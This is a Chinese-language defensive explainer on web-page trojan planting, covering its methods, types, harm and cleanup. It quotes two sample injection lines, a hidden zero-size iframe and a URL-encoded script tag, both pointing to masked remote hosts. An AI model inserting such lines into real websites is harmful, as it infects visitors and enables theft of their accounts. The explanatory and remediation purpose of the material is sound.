掛馬攻擊的介紹和防御
介紹
掛馬攻擊是指攻擊者在已經(jīng)獲得控制權(quán)的網(wǎng)站的網(wǎng)頁中嵌入惡意代碼(通常是通過IFrame、Script引用來實(shí)現(xiàn)),當(dāng)用戶訪問該網(wǎng)頁時(shí),嵌入的惡意代碼利用瀏覽器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用戶不知情的情況下下載并執(zhí)行惡意木馬。
方式
目前掛馬的主要方式是通過IFrame與Script嵌入網(wǎng)馬URL,比如下面的掛馬代碼:
- <iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>
這里通過將IFrame的width與height設(shè)置為0,使得嵌入的網(wǎng)馬URL在網(wǎng)頁上不可見。
- <script src=http://%68%68%6A%32***%63%6E></script>
這里Script里的URL是經(jīng)過URL encode編碼的。通過各種編碼、混淆、客戶端判斷等方式來隱藏、保護(hù)網(wǎng)馬是攻擊者掛馬常用的手段。除了這兩種常見的掛馬方式外,還有如下幾種:
1、 利用JavaScript執(zhí)行各種經(jīng)過編碼、混淆的攻擊代碼進(jìn)行掛馬。
2、 利用網(wǎng)頁跳轉(zhuǎn)、彈出新窗口等方式進(jìn)行掛馬。
3、 利用Flash等媒體封裝的方式進(jìn)行掛馬。
在CSS(層疊樣式表)里可以執(zhí)行JavaScript的瀏覽器中進(jìn)行掛馬。
類型
1、 數(shù)據(jù)庫掛馬
攻擊者利用SQL注入漏洞將掛馬代碼注入到數(shù)據(jù)庫的某些字段中,如果網(wǎng)站頁面使用到這些字段的值,并且沒做適當(dāng)?shù)倪^濾,就有可能導(dǎo)致用戶訪問該網(wǎng)站的頁面時(shí)執(zhí)行攻擊者注入的代碼。
2、 文件掛馬
攻擊者直接將掛馬代碼批量寫入服務(wù)端文件里以達(dá)到整站掛馬的目的。
3、 ARP掛馬
在與目標(biāo)站點(diǎn)同一局域網(wǎng)的情況下,攻擊者可以通過控制局域網(wǎng)中任意一臺(tái)主機(jī)計(jì)算機(jī)發(fā)起ARP欺騙,并將掛馬代碼注入到用戶請求的響應(yīng)頁面上,從而達(dá)到隱蔽的掛馬目的。這樣的攻擊方式在客戶端上也可能發(fā)生,比如用戶所在的局域網(wǎng)有ARP病毒,那么用戶請求的所有網(wǎng)站都有可能被注入掛馬代碼。
4、 服務(wù)端配置文件掛馬
比如IIS里的文件重定向、啟用文檔頁腳、修改IIS映射等掛馬。這類掛馬比較隱蔽,也是掛馬常用的技巧。
5、 XSS掛馬
利用XSS跨站腳本漏洞,將掛馬代碼注入到客戶端頁面以達(dá)到掛馬的目的。0x04 危害
網(wǎng)站被掛馬不僅嚴(yán)重影響到了網(wǎng)站的公眾信譽(yù)度,還可能對(duì)訪問該網(wǎng)站的用戶計(jì)算機(jī)造成很大的破壞。一般情況下,攻擊者掛馬的目的只有一個(gè):利益。如果用戶訪問被掛網(wǎng)站時(shí),用戶計(jì)算機(jī)就有可能被植入病毒,這些病毒會(huì)偷盜各類賬號(hào)密碼,如網(wǎng)銀賬戶、游戲賬號(hào)、郵箱賬號(hào)、QQ及MSN賬號(hào)等。植入的病毒還可能破壞用戶的本地?cái)?shù)據(jù),從而給用戶帶來巨大的損失,甚至讓用戶計(jì)算機(jī)淪為僵尸網(wǎng)絡(luò)中的一員。
修復(fù)思路
1、 通過上面介紹的“掛馬常見類型”迅速分析定位網(wǎng)站被掛馬的原因。
a) 數(shù)據(jù)庫掛馬:及時(shí)恢復(fù)數(shù)據(jù)庫或者利用嵌入的掛馬代碼,搜索數(shù)據(jù)庫,定位到掛馬代碼所在的字段值并清除。
b) 文件掛馬:使用工具或者命令遍歷網(wǎng)站所有文本文件,批量清除掛馬代碼。
c) ARP掛馬:查找出局域網(wǎng)中的ARP病毒源頭,清除病毒,并將相應(yīng)計(jì)算機(jī)進(jìn)行安全加固或重新安裝系統(tǒng)。
d) 服務(wù)端配置文件掛馬:如果上述的方法找不到掛馬代碼時(shí),就應(yīng)該查找網(wǎng)站服務(wù)端配置文件是否存在異常,并恢復(fù)。
e) XSS掛馬:這類掛馬使用不廣泛,修補(bǔ)網(wǎng)站的XSS漏洞即可解決問題。
及時(shí)檢測并修補(bǔ)網(wǎng)站本身以及網(wǎng)站所在服務(wù)端環(huán)境的各類漏洞,從而在根源上降低消除網(wǎng)站被掛馬的風(fēng)險(xiǎn)。
